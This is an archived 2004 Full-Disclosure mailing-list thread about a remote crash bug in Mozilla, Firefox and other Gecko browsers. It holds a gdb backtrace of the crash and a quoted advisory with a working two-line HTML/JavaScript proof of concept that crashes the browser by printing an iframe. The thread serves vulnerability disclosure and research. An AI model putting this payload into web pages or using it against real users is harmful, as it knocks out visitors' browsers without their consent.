[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <41B4B62C.1020706@secnetops.com>
From: kf_lists at secnetops.com (Kevin Finisterre)
Subject: [Advisory] Mozilla Products Remote Crash Vulnerability
(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0 0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from
/usr/lib/mozilla/components/libgklayout.so
#1 0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2 0x412cb905 in NSGetModule () from
/usr/lib/mozilla/components/libxpconnect.so
#3 0x412d28a5 in NSGetModule () from
/usr/lib/mozilla/components/libxpconnect.so
#4 0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5 0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6 0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7 0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from
/usr/lib/libmozjs.so
#8 0x411068c8 in nsJSContext::EvaluateString () from
/usr/lib/mozilla/components/libgklayout.so
#9 0x40fa0020 in nsScriptLoader::EvaluateScript () from
/usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from
/usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from
/usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from
/usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from
/usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from
/usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from
/usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xbffff1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x00000000 in ?? ()
#24 0xbffff1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xbffff1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x00000054 in ?? ()
#31 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#32 0xbffff1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xbffff1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x00000000 in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x00000001 in ?? ()
#43 0x00000001 in ?? ()
#44 0xbffff228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x00000054 in ?? ()
#49 0x00000001 in ?? ()
#50 0x00000000 in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xbffff218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x00000001 in ?? ()
#57 0x00000001 in ?? ()
#58 0x00000001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x00000001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x00000000 in ?? ()
#63 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#64 0xbffff268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x00000054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x00000000 in ?? ()
#72 0x0000000f in ?? ()
#73 0x00000054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x00000001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x00000000 in ?? ()
#79 0x08972690 in ?? ()
#80 0xbffff348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x00000028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)
-KF
Niek van der Maas wrote:
> Hi,
>
> I'm posting it here, the Mozilla guys didn't want to answer or even
> confirm this bug. No idea whether this one is exploitable or not, I'll
> leave that over to the readers of these lists.
> Bye,
>
> Niek van der Maas
> MaasOnline
> http://maas-online.nl/
>
>
> Mozilla Products Remote Crash Vulnerability
> ===========================================
>
> Vendor : The Mozilla Organisation
> Product(s) : Navigator, Firefox, other Gecko based products
> Version(s) : All released versions
> Platform(s) : All platforms (confirmed on Windows, Linux and SunOS)
> Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
> Advisory URL : http://maas-online.nl/security/advisory-mozilla-crash.txt
>
>
> DESCRIPTION
> While working on one of my projects I discovered a vulnerability in Firefox,
> allowing a attacker to crash the browser. Further investigation learned that
> this vulnerability also applies on other Mozilla products, like Navigator.
> All platforms and versions are affected.
> The crash occurs when a one-line JavaScript is executed which tries to print
> an iframe. The crash does not occur when executing this JavaScript in the
> 'onload' tag or after clicking a link (i.e., 'onclick').
>
>
> PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> <script type="text/javascript">window.frames.pocframe.print();</script>
> A sample page containing these 2 lines is available at
> http://maas-online.nl/security/poc-mozilla-crash.html
>
>
> PATCH / WORKAROUND
> No patch is available at this time. The only solution is to disable JavaScript
> execution at all.
>
>
> VENDOR RESPONSE
> The bug (#272381) was opened 2004-11-30 in Bugzilla.
> Until now (2004-12-06), no response or confirmation is received. Contacting
> the Mozilla Security Team on IRC didn't help either, it seems that they're
> simply not interested.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists